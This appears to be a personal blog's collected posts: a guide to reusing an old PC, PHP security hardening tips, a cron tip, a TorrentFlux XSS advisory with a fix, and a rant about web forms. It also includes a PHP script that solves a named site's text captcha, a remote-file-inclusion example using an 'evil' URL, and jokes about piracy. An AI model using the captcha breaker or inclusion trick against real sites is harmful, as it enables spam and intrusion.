Ok, you have an old computer that you will never use as your main pc, however you would either:

• Like to share files around the home.
• Use it to illegally legally download music/movies/tv shows overnight. (To help save your peak dl’s)
• Turn it into a webserver
• Your introduction to another OS eg. linux.
• Something else deconstructive. (Like world domination making peace)

So let’s start with the OS (Operating System):

Windows or Linux?

If you want to run do file sharing or a webserver: Linux

Downloading Stuff: Windows

Hang on a sec, Windows??? on an old PC. Oh.. yeah we can use something like 98?
No… Windows XP pro on an old pc, it can be done!
My choice of Windows was because Peer Guardian and utorrent run on it. (For “borrowing” music, games, tv shows. (You name it)

Installing the OS:

• Windows:

Get a copy of windows 98+ (utorrent works on 95 but PG doesn’t and our next program doesn’t support NT or 95 either)

Installing windows is easy, with XP you just pop in the disc, and follow the steps.

Or you could look at some of these guides if you are really stuck:

• http://www.windowsreinstall.com/
• http://www.theeldergeek.com/clean_installation_of_windows_xp.htm
• http://www.winsupersite.com/showcase/windowsxp_sg_clean.asp
• http://windows.radified.com/

Note for this example I am using Windows XP Pro :

So what is all this fuss about putting windows [running fast] on an old pc?

The Software from LitePC makes it possible. Get the version for your OS.

Yes, you could get it illegally, but they do a dam good job, so I would pay for it. (There is a FREE version)

If you need help, again you can drop me a line, or look at the knowledge base.

Now you have a fast windows based pc, and you are ready for the next step. :)

• Linux:

Step 1: Find a Linux Distro…

I love easy to install, easy to use, (and fast) ubuntu would be your best bet.

How can I get ubuntu?

Download and Burn it:

http://www.ubuntu.com/download

Get it shipped to your FREE:

https://shipit.ubuntu.com

How do I install it?

• A very easy install, make sure you BIOS is set to boot off CD, then pop the cd in. when it says boot: on the screen, and an ubuntu logo appears, type server. And the install starts. Just follow the easy prompts, and when it asks you to erase the disc select the option that is automatically selected. It is a very simple task! :)

Configure Remote Access:

Linux (Ubuntu):

First we need to enable the root user:

So login and type:

sudo passwd root
su

(You now use that account so type exit to logout and then log back in again as root.)

Type:

apt-get update
apt-get install ssh openssh-server

Beautiful!!!

Now to access we need a SSH Client.

Windows:

Putty (You just need Putty)

Mac OS:

MacSSH

If you are using Linux (as a client) you can install ssh (In ubuntu: apt-get install ssh)

Putty is very easy to use: ie. just type in the IP Address of the computer, and all good.

How to find the IP Address:

ifconfig (it is ipconfig for windows)

Will tell you all that you need to know! :)
Windows:

You have two choices here if you are using XP Pro or 2000:

Remote Desktop (RDP)

Or VNC

My Favourite VNC Server: TightVNC (Did I mention the price?? Free!)

If you don’t have either XP Pro or 2000 then you will have to use VNC.

Part two is coming soon!

Today, I still don’t remember how I got to this blog post but anyway I saw that they had a text based captcha.

The blog author claims that it prevents spam, which it does! Because it added an extra layer of uniqueness to his code and unintelligent spam bots don’t realise. Anyway now for the breaking:

//Break Text Based Captcha:
$regex = ‘#/>\s+

\s+
$page = getpage(’http://pooteeweet.org/blog/259/p/1′);

preg_match($regex, $page, $matches);
$n1 = intval($matches[1]);
$n2 = intval($matches[3]);

$op = $matches[2];

switch ($op) {
case ‘+’:
$INTresult = intval($n1+$n2);
break;

case ‘-’:
$INTresult = intval($n1-$n2);
break;

case ‘/’:
$INTresult = intval($n1/$n2);
break;

case ‘*’:
$INTresult = intval($n1*$n2);
break;

default:
die(’Illegal Operation’);
break;
}

echo $INTresult;
?>

Note that my framework has a function getpage which is just a simple (well quite advanced actually…) curl function.

There you have it $INTresult is the answer to the math problem.

Yes this is a very simple text captcha but breaking a more advanced one wouldn’t require that much more effort.

Regards,

Steven Roddis

I get a lot of questions regarding how to increase security in their PHP App.

Aside from the obvious, write secure code; there are two easy “switches that you can flick”.

Disable: URL fopen wrappers

This will prevent most exploitations of the classic File Inclusion Vulnerability.

eg. include($foo.’bar.php’);

Now if $foo is set to ‘http://www.stevenroddis.com/evil?’

The script grabs PHP code from “http://www.stevenroddis.com/evil?bar.php”

But if URL fopen wrappers if off, then the hacker can only use files on your server. (Still with limitations such as the appending string)

However there is a downside to this some applications may use url wrappers to download data off the web, you can work around it by using curl, but you might not want to.

How?

php.ini (most people won’t have access to this)

allow_url_fopen off

.htaccess

php_flag allow_url_fopen off

Turn Off: Register Globals

Yes, it is off by default but the number of sites that get hacked due to it being on is astounding. Register Globals is not needed in 99.99% of PHP apps.

How?

php.ini (most people won’t have access to this)

register_globals off

.htaccess

php_flag register_globals off

#3 Bonus: Turn off Error Reporting

A lot of sites show sensitive information can make it easier to find a security hold and/or exploit it.

How?

php.ini (most people won’t have access to this)

display_errors Off

.htaccess

php_flag display_errors Off

Enforce these in your web app:

Don’t let stupid configuration changes bring down your defences, inside your php application make sure you die() and give some [nice] error, when say register globals is turned back on.

Code:

if (@ini_get(’register_globals’))
{
die();
}

You might want to do it also for allow_url_fopen (replace “register_globals” in the above with “allow_url_fopen”).

There you have it two (well four) easy and simple steps to greatly increase security in your PHP application. (Three of them don’t require changing your code)

Regards,

Steven Roddis

Q: Why do I always get crap in my home directory even though my cron job looks like this:

*/15 * * * * wget http://site.com/cron.php >/dev/null 2>&1

A:

*/15 * * * * wget -O /dev/null http://site.com/cron.php >/dev/null 2>&1
This puts the output (-O) down the [unix] drain.

Name: TorrentFlux User-Agent XSS Vulnerability
Published: 2006-10-06
Critical Level: Moderate
Type: Cross-Site Scripting
Where: Remote
Status: 0-Day
Software: Torrentflux 2.1
Discoverer: Steven Roddis (http://www.stevenroddis.com)

I gave the authors of this product a week (more than usual) just to contact me, they have failed to do so; so I am releasing this vulnerability publicly!

/admin.php

Line: 325

$ip_info = $ip_resolved.”
“.$user_agent;

Useragent is not esacped.

Solution:

Edit source code:

/admin.php

Line: 325:

$ip_info = htmlentities($ip_resolved, ENT_QUOTES).”
“.htmlentities($user_agent, ENT_QUOTES);

Users fill out many forms day, whether it is just loging-in, signing-up or something else the user has to repeditivly enter in his or her infomation. The worst example that I have found is Microsoft, lets look at the steps to get a free usb drive from them. (The same thing applies to pretty much, if not all forms that Microsoft has.) You need to sign in with your passport. Ok, I have entered all the infomation except for the answers to the questions, many times before, so why can’t they just ask me for the answers insted of asking me for everything again. I have seen some sites where they try to help you either by having a checkbox that you can check to say if your billing is the same as your postal address, or you get the same big form but some of the info that they already have on you is there. Lets start with the first thing in that sentence: the checkbox to say that your billing is the same as your postal. The problem I have with some of the site. Is that I paid via PayPal, and see no need for a billing address. Thurermore, I am contantly asked for my phone number, (as a required field) but I see no reason for them to ring me. An example is an online advertising company, who asked me for my phone number. (I was a publisher with them) But I could never see them calling me, as they had my email, and I live in Australia so it would cost a bit more for a call… Read the rest of this entry »